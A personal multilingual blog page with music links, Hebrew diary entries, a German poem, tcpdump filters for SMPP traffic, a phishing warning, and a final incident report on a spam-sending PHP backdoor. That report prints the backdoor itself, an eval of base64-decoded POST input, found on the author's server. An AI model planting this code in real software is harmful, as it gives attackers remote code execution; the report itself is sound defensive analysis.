Petya K [entries|archive|friends|userinfo]
Petya K

[ userinfo | ljr userinfo ]
[ archive | journal archive ]

Links
[Links:| Fast Slow ljr_fif tango ]

[Sep. 5th, 2021|11:10 pm]
https://youtu.be/Cgsp7HcF6wQ
Link1 comment|Leave a comment

[Oct. 6th, 2020|12:36 am]
[Current Mood | blank]
[Current Music |Sven Väth - L'Esperanza (original album mix)]

LinkLeave a comment

[May. 2nd, 2019|06:16 am]
[Current Mood | sleepy]
[Current Music |БАЗАРА ЗИРО - Хулигангстер]

https://www.youtube.com/watch?v=EdWPk3rFSfw
LinkLeave a comment

[Dec. 27th, 2018|04:36 pm]
[Current Mood | calm]
[Current Music |Keith Jarrett - Never Let Me Go]

Link1 comment|Leave a comment

מכתב שלישי [Sep. 27th, 2017|11:07 pm]
[Current Mood | sleepy]
[Current Music |Ennio Morricone - Deborah's Theme]


שלום יומן.
כמה זמן אני לא כתבתי פה,
ויש לי הרבה חדשות,
אבל אני עוד לא יודע עברית דיו טוב
כדי לכתוב הכול.

אני עוד גר ברוסיה,
אבל יש לי עבודה בחברה עשראלי,
וכאשר אני אחליט לעלות לישראל,
אוכל לעבוד בה.

אני לומד עברית פעמיים בשבוע,
אני יודע זמן עבר וזמן עתיד,
אבל חסר לי הרבה מילים,
וצריך לזכור הרבה מילים.

מה עוד? יהיו בחירות של נשיא ברוסיה,
ואנחנו רוצים לשנות נשיא,
אבל הוא לא רוצה להשאיר המשרה,
ואולי תהיה מהפכה. אבל אולי היא לא תהיה,
ולכן לא יהיה סיכוי ברוסיה.

חבל.

Link5 comments|Leave a comment

[Jun. 10th, 2017|07:47 pm]
[Current Mood | tired]
[Current Music |Oxxxymiron — Не от мира сего]

https://www.facebook.com/events/313683972392347/
Link1 comment|Leave a comment

#ДимонОтветит [Mar. 31st, 2017|01:29 am]
[Current Mood |working]
[Current Music |U137 - Varberg]

Link1 comment|Leave a comment

[Mar. 11th, 2017|12:10 am]
[Current Mood |working]
[Current Music |Nico Muhly - Reading]

Димон, айфон, кроссовки, спиздить, подрезать
Link3 comments|Leave a comment

Muttley: "Snicker Snicker" [Dec. 30th, 2016|03:26 am]
[Current Mood | sleepy]
[Current Music |Nicki Minaj - Super Bass]https://2018.navalny.com/
Link1 comment|Leave a comment

tcpdump smpp filter submit_sm submit_sm_resp [Oct. 4th, 2016|06:07 pm]
[Current Mood |working]
[Current Music |t.A.T.u. - Waste Management]

Few commands to match SMPP data stream written into a file
(collected with tcpdump -ni bond2 -U -w %Y%m%d-%s.pcap -G 600 port 5700)


submit_sm
tcpdump -r 20160930-1475207678.pcap -tt 'tcp[2:2] = 5700 && (((ip[2:2] - ((ip[0]&0xf)<<2)) - ((tcp[12]&0xf0)>>2)) != 0) && tcp[(((tcp[12:1] & 0xf0) >> 2) + 4):4] = 0x00000004'

Select only:
* tcp[2:2] = 5700 - outgoing streams (destination port 5700)
* (((ip[2:2] - ((ip[0]&0xf)<<2)) - ((tcp[12]&0xf0)>>2)) != 0) - where there's some tcp data in the packet
* tcp[(((tcp[12:1] & 0xf0) >> 2) + 4):4] = 0x00000004 - SMPP command id is SUBMIT_SM


submit_sm_resp (OK)
tcpdump -r 20160930-1475207678.pcap -tt 'tcp[0:2] = 5700 && (tcp[12:1]&0xf0)>>2 = 32 && (((ip[2:2] - ((ip[0]&0xf)<<2)) - ((tcp[12]&0xf0)>>2)) != 0) && tcp[(((tcp[12:1] & 0xf0) >> 2) + 4):4] = 0x80000004 && tcp[(((tcp[12:1] & 0xf0) >> 2) + 8):4] = 0x00000000'

Select only:
* tcp[0:2] = 5700 - incoming streams (soucre port 5700)
* (tcp[12:1]&0xf0)>>2 = 32 - length of tcp packet is 32 bytes (might be excessive limitation, but is true in my case
* (((ip[2:2] - ((ip[0]&0xf)<<2)) - ((tcp[12]&0xf0)>>2)) != 0) - there's tcp data
* tcp[(((tcp[12:1] & 0xf0) >> 2) + 4):4] = 0x80000004 - SMPP command id is SUBMIT_SM_RESP
* tcp[(((tcp[12:1] & 0xf0) >> 2) + 8):4] - command status is 0 (OK)


Links:
* Tutorial by Sebastien Wains
* RFC 793
* SMPP 3.4 protocol specification
Link14 comments|Leave a comment

חתול שחקן [Jun. 11th, 2016|09:40 am]
[Current Mood |awake]
[Current Music |Sunlight Project - What I Wanted]

Link9 comments|Leave a comment

מכתב שני [Jan. 10th, 2016|11:13 am]
[Current Mood |working]
[Current Music |High Contrast - 238 Days]


המורה הנכבד, תודה רבה לך.

אני לא כותב במחברת, כי אני רעיל
שאתה שומח את שיוערי-הבית באימייל תמיד.
אני תלמיד חרוץ, אבל עצל. מה לעשות,
החיים קשים. אבך אני משתנה.

אשתי מוסרת לך ד"ש.

בברכה,
התלמיד.
Link3 comments|Leave a comment

שמי פיוטר קוטס [Dec. 31st, 2015|08:04 am]
[Current Music |Angels and Airwaves - Shove]

הינה מודעה ראשון שלי בעברית.
שמי פיוטר קוטס ואני גם רוסי וגם יהודי כבר.
שנה טובה לכולם ולהתראות.

ניצחון!
Link4 comments|Leave a comment

Gedichte aus dem Nachlasse von Alfred Kohts [May. 31st, 2014|07:34 pm]
[Tags|]
[Current Music |Ivan Dorn - Northern Lights]

Gedichte aus dem Nachlasse von Alfred Kohts (1873)

"Ahnest du wie kurz die Frist
Deines jungen Lebens ist"

Zieht hin ihr monden schein gekussten Wellen
Und klagt der Liebsten meine Sehnsuchtspein
Wenn ihr beim ersten Sonnenstrahl dem hellen
Rauscht durch die Felsen weit ins Land hinein.

Dann netzet ihren Fuss, denwunderzarten
Und murmelt leis ihr meineBotshaft zu:
Von allen Blumenin dem bunten Garten
Der Liebe bist die allerschonste Du!

Senkt sie ums Haupt der Morgensonne Gluten
Ineuch den unergrundlich tiefen Blick,
Sohaltet fest das Bild, ihr treuen Fluten,
Bringt jene theuren Zuge mir zuruck.

Bringt sie zu mir und lasst mich glucklich schauen
In ihres Augenwundersamen Nahct,
Was sie in Lieb und herzlichen Vertrauen
Auch in der Ferne meiner noch gedacht.


SONETT.

Wie eft durchzuckt ein grenzenloses Wehe
Meinliebend Herz, seh ich Denkaltes Wesen,
Und weiderum, wie schnellbin ich genesen
Wennich Dein Augin Liebund lecuhten sehe.

Wie oft, wennich um einenBlick nur flehe
Triebst Du mich kal zuruck- was ist gewesen?
Ich mocht es gern in Deinem Auge lesen,
Du aber fliehest grollend meine Nahe.

Du bist mir unergrundlich wie die Wogen
Des Meers, die jetzt im Sonnenlufte kosen,
Und jetzt Verderben spruhn in wilem Tosen.
Ich weisses nicht, was mich zu Dir gezogen,
War es DeinLieben, oder wars Dein Hassen,
Dochweiss ich was: ich kann nict von Dir lassen.
Link2 comments|Leave a comment

WARNING: phishing alert [May. 13th, 2014|01:22 pm]
[Current Music |Ennio Morricone - Deborah's Theme]

If you received email from me today with the subject "Confidential" and a link to "techmore.com.my", please just delete it.

If you opened the link and entered your password then:
1) your password has been stolen
2) most probably you've spammed a lot of your correspondences with similar phishing email

So you have to:
1) change your password as quickly as you can
2) ask your friends not to open this email from you. You could just copy this text and send it to them.

I'm sorry for possible inconvenience.

Если вы сегодня получили от меня email с темой "Confidential" и ссылкой на "techmore.com.my", пожалуйста, просто удалите его.

Если вы открыли ссылку и ввели свой пароль, то:
1) ваш пароль своровали
2) скорее всего от вашего имени подобное письмо было направлено вашим корреспондентам

Вам нужно:
1) срочно поменять свой пароль
2) попросить ваших друзей не открывать это письмо. Вы можете просто отослать им этот текст.

Извините за доставленные неудобства.
LinkLeave a comment

[Apr. 20th, 2014|11:46 pm]
[Current Mood |working]
[Current Music |Pablo Ziegler - El Vals Del Duende]

Чувство таково, что требует осуществления,
в смысле признания реальности в том или ином виде,
получение отклика извне, который будет воспринят
как индивидуально-специфический.

Отсюда и заработок психотерапевта. Специалист позволяет
пациенту в безопасной обстановке реализовать чувство,
выдавая поддерживающий отклик: наказывать не будут,
никто даже не узнает.

Публично высказывать мнение опасно, потому что
множество людей считают мнение сродни закону Ньютона,
от всякого мнения на голове у них вырастает шишка.
И это в лучшем случае.

Одна моя бабушка 1929 года рождения, её дед,
Вукол Григорьевич Дрепин, был известен в деревне
Апрелевка Воронежской области Боринского района тем,
что валял валенки. Сын его, Василий, вернувшись
с первой мировой войны с изрытым то ли оспой,
то ли снарядом, лицом, был выбран председателем
колхоза и никого не выдавал за "колоски".

С сестрой я встречаюсь редко, но последнее
время почаще - раз в месяц где-то. Мы шли
по спальному району в г. Москве и я говорю:

- Смотри, вот идёт [info]aculeata. Юля, привет!
Кстати это моя сестра.

С Юлей я встречаюсь реже, чем с сестрой,
но она тут же сказала, не задумываясь:

- Очень красивая. Твоя сестра.

Потом подумала и добавила:

- Ну в смысле ты тоже ничего.

Юля ходит с рюкзаком литров на шестьдесят
и торопится по делам, наверное. Её поэтому
как-то совсем неудобно отвлекать теперь.
LinkLeave a comment

snaked: cron replacement (YAPC Europe 2013) [Aug. 14th, 2013|07:44 am]
[Tags|, ]
[Current Mood | anxious]
[Current Music |Chicane & Sons - One More Time [ASOT 624]]

http://www.youtube.com/watch?v=fUwY3K35yAc

рассказываю про старые дела в Яндексе,
определяюсь с планами на будущее
Link2 comments|Leave a comment

[Aug. 7th, 2013|09:46 pm]
[Tags|]
[Current Mood |working]
[Current Music |Secede – Age Tandems]Link2 comments|Leave a comment

собеседование в bdbd.ru (корпорация РБС) [Jun. 8th, 2013|06:28 pm]
[Tags|]
[Current Mood | sleepy]
[Current Music |Mario Lanza - Be My Love (From The Toast Of New Orleans)]

Разгребая старые бумаги, нашел задачки по Perl:

https://plus.google.com/photos/106795747251958842191/albums/5887118998883354033?authkey=COLe4OSIgZ_lsAE

которые достались мне на собеседовании
в "корпорации РБС" в сентябре 2011 на эту вакансию:
http://hh.ru/vacancy/4853562

Собственно собеседования никакого не было - я приехал,
посадили в комнату, дали листочки, ручку и оставили.
Сказали, напишите ответы. В комнате были компьютеры,
включать которые не разрешили.

Немножко я даже полистал задачи (по листочкам видно,
что попытался на что-то ответить), но потом решил,
что с товарищами нам не по пути и уехал.

Может кому-нибудь пригодится потренироваться.
Link10 comments|Leave a comment

cb6f82f3e4007bdaccf419abafab94c8 [Apr. 5th, 2013|08:51 pm]
[Tags|, ]
[Current Mood |working]
[Current Music |Hybrid Leisureland - Division and composition]

Очередной раз наспамили с одного из моих серверов.

Конструкция практически такая же, как в прошлый раз:
похоже (логов не сохранилось), что под пользовательским аккаунтом
через ftp залили файл следующего содержания в слегка закодированном виде
(оригинал см. по ссылке снизу):

if(isset($_POST["code"]))
{
    eval(base64_decode($_POST["code"]));
}
Далее через этот файл несколько раз послали спама
на пару десятков тысяч адресов.

Обнаружил дырку spamcop.net, который пожаловался провайдеру,
а тот уже переслал нам. Обнаружил конкретный файл путем просмотра
error_log проскирующего nginx за время, когда в очереди исходящих писем
появилось первое задержанное письмо. Нашлась такая строка:

2013/03/01 16:05:14 [error] 3713#0: *19382 upstream timed out (110: Connection timed out) while reading response header from upstream, client: 201.182.92.138, server: www.joomla.dev.DOMAIN.ru, reques
t: "POST /.e523.php HTTP/1.1", upstream: "http://127.0.0.159:80/.e523.php", host: "www.joomla.dev.DOMAIN.ru"

Имя файла показалось подозрительным, дальше все раскрутилось легко.

Обращения к вредоносному файлу делались со следующих ip адресов:
1) 201.182.92.138 (Панама)
2) 31.184.244.18 (Объединенные Арабские Эмираты)

Материалы:
1) .e523.php
2) листинг очереди sendmail
3) примеры писем из очереди: [1], [2], [3], [4], [5]
4) access_log веб-сервера

Единственный текст, похожий на идентификатор системы,
это закомментированный текст cb6f82f3e4007bdaccf419abafab94c8
в начале программы. Что означает, непонятно. Тридцать два
шестнадцатиричных символа.
LinkLeave a comment

navigation
[ viewing | most recent entries ]
[ go | earlier ]